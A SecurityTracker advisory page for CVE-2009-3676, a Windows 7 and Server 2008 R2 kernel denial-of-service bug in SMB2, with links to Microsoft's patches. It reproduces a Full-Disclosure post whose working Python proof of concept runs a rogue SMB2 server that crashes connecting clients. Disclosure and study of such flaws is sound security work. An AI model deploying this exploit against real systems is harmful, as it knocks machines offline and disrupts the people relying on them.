SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows Kernel Vendors:   Microsoft
Windows Kernel Flaw Lets Remote Users Deny Service
SecurityTracker Alert ID:  1023179
SecurityTracker URL:  http://securitytracker.com/id/1023179
CVE Reference:   CVE-2009-3676   (Links to External Site)
Updated:  Apr 13 2010
Original Entry Date:  Nov 13 2009
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 7, 2008 R2
Description:   A vulnerability was reported in the Windows Kernel. A remote user can cause denial of service conditions.

A remote user can send specially crafted data to cause the target service to enter an infinite loop and the system to become unavailable.

The vendor was notified on November 8, 2009.

Laurent Gaffie reported this vulnerability.

Impact:   A remote user can cause denial of service conditions.
Solution:   The vendor has issued the following fixes:

Windows 7 for 32-bit Systems:

http://www.microsoft.com/downloads/details.aspx?familyid=389184C5-9001-497D-BDF4-81F97ECB617F

Windows 7 for x64-based Systems:

http://www.microsoft.com/downloads/details.aspx?familyid=F3495DAE-71F3-421D-A191-D26965F26AD1

Windows Server 2008 R2 for x64-based Systems:

http://www.microsoft.com/downloads/details.aspx?familyid=CD1A046E-915D-4904-B753-5A24BE10C504

Windows Server 2008 R2 for Itanium-based Systems:

http://www.microsoft.com/downloads/details.aspx?familyid=541E9E2F-EC1D-42B2-AAE5-481C0D435169

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms10-020.mspx

The vendor's original advisory is available at:

http://www.microsoft.com/technet/security/advisory/977544.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms10-020.mspx (Links to External Site)
Cause:   State error

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Windows 7 , Server 2008R2 Remote Kernel Crash

--===============1464623114==
Content-Type: multipart/alternative; boundary=001636417d5f7548a00478164ff4

--001636417d5f7548a00478164ff4
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffi=E9
- Severity: Medium/High
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: Laurent Gaffi=E9
#

import SocketServer

packet =3D "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        input =3D self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch =3D SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces po=
rt
445
launch.serve_forever()

#SDL FAILED

V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Windows 7/Server 2008R2.


VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/
http://g-laurent.blogspot.com/
http://twitter.com/g_laurent
IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffi=E9
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug
shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come.

--001636417d5f7548a00478164ff4
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>- Release d=
ate: November 11th, 2009<br>- Discovered by: Laurent Gaffi=E9<br>- Severity=
: Medium/High<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D<br><br>I. VULNERABILITY<br>
-------------------------<br>Windows 7 * , Server 2008R2 Remote Kernel Cras=
h<br><br>II. BACKGROUND<br>-------------------------<br>#FAIL,#FAIL,#FAIL<b=
r>SDL FAIL, &#39;Most Secure Os Ever&#39; --&gt; Remote Kernel in 2 mn.<br>
#FAIL,#FAIL,#FAIL<br><br>III. DESCRIPTION<br>-------------------------<br>S=
ee : <a href=3D"http://g-laurent.blogspot.com/">http://g-laurent.blogspot.c=
om/</a> for much more details<br><br>#Comment: This bug is specific Windows=
 7/2008R2.<br>
<br>IV. PROOF OF CONCEPT<br>-------------------------<br>#win7-crash.py:<br=
>#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)<b=
r>#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure=
() caused by an infinite loop.<br>
#NO BSOD, YOU GOTTA PULL THE PLUG.<br>#To trigger it fast from the target: =
\\this_script_ip_addr\BLAH , instantly crash <br>#Author: Laurent Gaffi=E9<=
br>#<br><br>import SocketServer<br><br>packet =3D &quot;\x00\x00\x00\x9a&qu=
ot; # ---&gt; length should be 9e not 9a.. <br>
&quot;\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00&quot=
;<br>&quot;\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=
&quot;<br>&quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0=
0\x00&quot;<br>
&quot;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot=
;<br>&quot;\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41=
&quot;<br>&quot;\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x0=
1\x00&quot;<br>
&quot;\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01&quot=
;<br>&quot;\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20=
&quot;<br>&quot;\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa=
0\x0e&quot;<br>
&quot;\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a&quot;<br><br=
><br>class SMB2(SocketServer.BaseRequestHandler):<br><br>=A0=A0=A0 def hand=
le(self):<br>=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 <br>=A0=A0=A0=A0=A0=A0=A0 print=
 &quot;Who:&quot;, self.client_address<br>
=A0=A0=A0=A0=A0=A0=A0 input =3D self.request.recv(1024)<br>=A0=A0=A0=A0=A0=
=A0=A0 self.request.send(packet)<br>=A0=A0=A0=A0=A0=A0=A0 self.request.clos=
e()<br>=A0=A0=A0=A0=A0=A0=A0 <br>launch =3D SocketServer.TCPServer((&#39;&#=
39;, 445),SMB2)# listen all interfaces port 445<br>launch.serve_forever()<b=
r>
<br>#SDL FAILED<br><br>V. BUSINESS IMPACT<br>-------------------------<br>A=
n attacker can remotly crash any Windows 7/Server 2008R2.<br><br><br>VI. SY=
STEMS AFFECTED<br>-------------------------<br>Windows 7, Windowns Server 2=
008R2<br>
<br>VII. SOLUTION<br>-------------------------<br>No patch available for th=
e moment, your vendor do not care.<br>Close SMB feature and ports, until a =
real audit is provided.<br><br>VIII. REFERENCES<br>------------------------=
-<br>
<a href=3D"http://blogs.msdn.com/sdl/">http://blogs.msdn.com/sdl/</a><br><a=
 href=3D"http://g-laurent.blogspot.com/">http://g-laurent.blogspot.com/</a>=
<br><a href=3D"http://twitter.com/g_laurent">http://twitter.com/g_laurent</=
a><br>
IX. CREDITS<br>-------------------------<br>This vulnerability has been dis=
covered by Laurent Gaffi=E9<br>Laurent.gaffie{remove-this}(at)<a href=3D"ht=
tp://gmail.com">gmail.com</a><br><br>X. REVISION HISTORY<br>---------------=
----------<br>
November 8th, 2009: MSRC contacted<br>November 8th, 2009: MSRC acknoledge t=
he vuln<br>November 11th, 2009: MRSC try to convince me that multi-vendor-i=
pv6 bug shouldn&#39;t appears on a security bulletin.<br>November 11th, 200=
9: Win 7 remote kernel smash released<br>
<br>XI. LEGAL NOTICES<br>-------------------------<br>The information conta=
ined within this advisory is supplied &quot;as-is&quot;<br>with no warranti=
es or guarantees of fitness of use or otherwise.<br>I accept no responsibil=
ity for any damage caused by the use or<br>
misuse of this information.<br><br>XII.Personal Notes<br>------------------=
-------<br>More Remote Kernel FD @MS to come.<br><br><br>

--001636417d5f7548a00478164ff4--


--===============1464623114==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============1464623114==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC